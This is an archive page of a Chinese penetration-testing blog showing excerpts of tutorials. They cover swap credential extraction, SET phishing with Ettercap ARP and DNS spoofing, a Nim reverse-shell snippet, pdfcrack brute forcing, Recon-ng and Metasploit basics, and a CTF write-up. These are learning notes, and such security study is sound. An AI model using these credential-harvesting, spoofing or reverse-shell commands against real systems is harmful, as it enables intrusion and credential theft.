avatar
文章
331
标签
30
分类
0

Home
Archives
Tags
Categories
List
  • Music
  • Movie
Link
About
The Blog of Monoceros406
搜索
Home
Archives
Tags
Categories
List
  • Music
  • Movie
Link
About

The Blog of Monoceros406

swap_digger使用方法
发表于2024-01-13|渗透测试
swap_digger使用方法在目标机器上下载并运行: 123wget https://raw.githubusercontent.com/sevagas/swap_digger/master/swap_digger.shchmod +x swap_digger.shsudo ./swap_digger.sh -vx -c -v输出冗余信息 -x获取扩展凭证 -c自动删除生成的工作目录。 功能有:自动提取swap并搜索Linux用户凭证、Web表单凭证、Web表单电子邮件、HTTP基本认证、WiFi SSID和密钥等。
SET常用方法
发表于2024-01-13|渗透测试
SET常用方法Web攻击向量依次选择选项1、2、3、1,即社会工程学攻击、Web攻击向量、证书获取攻击方式、使用Web模板,并输入目标主机IP地址,随后选择2,即克隆Google站点。 如果用户目录结构依赖/var/www/html目录,则需要复制/var/www/下所有文件到/var/www/html中,回车即可。 如果Apache等占用80端口,会提示关闭,y即可。 接下来需要使用Ettercap的dns_spoof插件实施ARP攻击和DNS欺骗。 修改/etc/ettercap/etter.dns,例如攻击主机IP为192.168.29.139,则添加: 1*    A    192.168.29.139 使用Ettercap发起ARP攻击,启动dns_spoof插件,实施DNS欺骗: 1ettercap -Tq -M arp:remote -P dns_spoof /192.168.29.139// /192.168.29.2// 当目标主机访问任何网站时 ...
Recon-ng初探
发表于2024-01-13|渗透测试
Recon-ng初探模块安装Kali自带Recon-ng,但模块一个没装,得科学上网,然后recon-ng的shell中执行: 1marketplace install all 示例选择模块: 1modules load recon/domains-hosts/hackertarget 查看模块信息: 1info 设置目标: 1options set SOURCE blog.bbskali.cn 运行模块: 1show hosts 实战枚举百度网站子域名,并导出为csv。 12345678helpshow modulesuse recon/domains-hosts/baidu_siteshow optionsset SOURCE baidu.comrunuse reporting/csvrun
PDF加密解密
发表于2024-01-13|渗透测试
PDF加密解密给文件添加密码: 1pdftk kali.pdf output out.pdf user_pw 666666 #kali.pdf加密为out.pdf 密码为666666 暴力破解: 1pdfcrack -f out.pdf -n 6 -m 8 -c 0123456789 #-f要破解的文件 -n最短多少字符 -m 最长多少字符 -c使用的字符集 支持字典: 1pdfcrack -f out.pdf -w pass.txt
Nim入门
发表于2024-01-13|编程语言
Nim入门配置按照实际情况配置IP及端口,保存文件为nimshell.nim。 123456789var    targetIP="192.168.1.25"    targetPort="4444"let    exitMessage="Exiting.."    changeDirectoryCommand="cd"    defaultDirectory="C:\\"try:    socket.connect(targetIP,Port(parseInt(targetPort))) 编译1nim c -d:mingw --app:gui nimshell.nim && mv nimshell.exe myshell.exe
Metasploit基础教程
发表于2024-01-13|渗透测试
Metasploit基础教程概述初始化启动PostgreSQL: 1service postgresql start 创建和初始化数据库: 1msfdb init 工作区创建123workspace #查看所有工作区workspace -a test #添加名为test的工作区workspace default #转到default工作区 导入扫描报告12db_import /root/openvas.xmlworkspace -v #查看导入的主机 模块查询预分析12host #查看扫描出的主机vulns #查看扫描出的漏洞 手动查找123456search [options] <keywords>    [options]:        -h 显示帮助        -o <file> 指定输出信息保存文件 格式csv        -S <string> 搜索指定字符串        -u 指定搜索模块 部分keywords: 关键字 描述 aka 别名 author 作者 arch 架构 bid Bugt ...
Kali-Linux渗透测试入门
发表于2024-01-13|渗透测试
Kali-Linux渗透测试入门信息收集发现主机netmask将IP范围转换为CIDR格式: 1netmask -c 192.168.0.0:192.168.2.255 将IP范围转换为标准子网掩码格式: 1netmask -s 192.168.0.0:192.168.2.0 traceroute获取目标主机路由条目: 1traceroute 62.234.110.28 nmap略。 netdiscover检查在线主机。 123netdiscover #尽可能发现多个在线主机netdiscover -r 192.168.1.0/24 #指定区间netdiscover -p #被动ARP监听 域名分析whois查找指定帐号/域名的用户相关信息。 1whois baidu.com dmitry用途同上。 123dmitry -w baidu.com #whoisdmitry -s baidu.com -o subdomain #-s查子域名 -o输出文件 要挂梯子dmitry -p 192.168.29.136 #端口扫描 dnsenum收集域名信息,如:主机地址信息 ...
Kali-Linux常用密码攻击方法
发表于2024-01-13|渗透测试
Kali-Linux常用密码攻击方法Stasprocessor利用马尔可夫攻击方式分析已有的密码字典文件: 123456789statsgen [options] passwords.txt #--version #-h,--help #-o password.marsks,--output=password.masks 保护掩码和统计信息到一个文件 #--hiderare 隐藏比例<1%的统计项 #--minlength=8 过滤最小长度为8的密码 #--maxlength=8 #--charset=loweralpha,numeric 指定过滤的密码字符 #--simplemask=stringdigit,allspecial 过滤密掩码格式 例如分析rockyou.txt密码文件: 1statsgen rockyou.txt 内容分别为: 密码长度统计信息。 密码字符集统计。 密码复杂性统计。 简单掩码统计。 密码字符串掩码格式的高级统计。 掩码格式: 掩码格式 含义 ?l a~z ?u A~ ...
Artfuscator使用方法
发表于2024-01-13|逆向工程
Artfuscator使用方法安装123456git clone https://github.com/JuliaPoo/Artfuscatorcd Artfuscatorgit submodule update --recursive --init --remotecd elvmmake art #事实证明报错也问题不大cd .. 使用在Artfuscator的目录下放置C语言文件,例如hewwo.c。再执行: 1make hewwo IMG=etc/niko-grey.png 其中,选择的图片为当下目录的etc/niko-grey.png。图片要求单通道灰度图片。 生成的文件在dist文件夹下,名称为hewwo.art的可执行文件。
NSSCTF-Round16个人解题报告
发表于2024-01-13|解题报告
NSSCTF-Round#16 Basic个人解题报告test your Debugger三血! 很简单一个动调,动起来就行了。 CompileMe!!!二血! 一个自称为.NET8.0框架的C#工程,改成7.0运行发现类嵌套过多,爆栈了… 改写成C语言发现gcc不理我了,改成Python竟然也爆栈。 搓一个Python脚本把每个return的操作扒下来,记到文件里。 1234567891011121314f=open('Program.cs',encoding='utf-8')content=f.readlines()ptr=52res=[0 for i in range(0,20000)]res[0]=content[ptr][26:45]fin=res[0]for i in range(1,18278): ptr+=9 res[i]=content[ptr][26:45]f.close()f3=open("res.txt",'w')for i in range(0,18278): f ...
1…232425…34
avatar
Monoceros406
Windows系统安全爱好者
文章
331
标签
30
分类
0
Follow Me
公告
哪里排版出锅了请告诉我QwQ QQ:1295625063
最新文章
Linux编程入门-系统选项2025-06-21
Linux编程入门-时间2025-06-15
Linux编程入门-用户管理与安全2025-06-15
Linux编程入门-内存管理2025-06-15
Linux编程入门-进程2025-06-14
标签
漏洞复现 恶意代码 密码学 Python 渗透测试 取证 编程语言 逆向工程 AWD Win系统调试 其他 GUI开发 解题报告 沙盒逃逸 算法 Win内核安全 OpenSSL 移动安全 UEFI 数学建模 Win驱动开发 WinAPI IoT PWN 前端开发 Web Linux Web3 后端开发 Misc
归档
  • 六月 20258
  • 五月 20259
  • 十二月 202413
  • 十一月 202412
  • 十月 202420
  • 九月 20243
  • 八月 20248
  • 七月 202413
网站资讯
文章数目 :
331
已运行时间 :
本站访客数 :
本站总访问量 :
最后更新时间 :
©2020 - 2025 By Monoceros406
框架 Hexo|主题 Butterfly